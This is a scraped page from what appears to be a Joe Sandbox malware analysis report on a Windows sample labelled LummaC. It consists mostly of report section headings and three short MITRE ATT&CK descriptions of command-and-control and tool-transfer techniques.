Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TTsfmr1RWm.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Windows Analysis Report
TTsfmr1RWm.exe

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre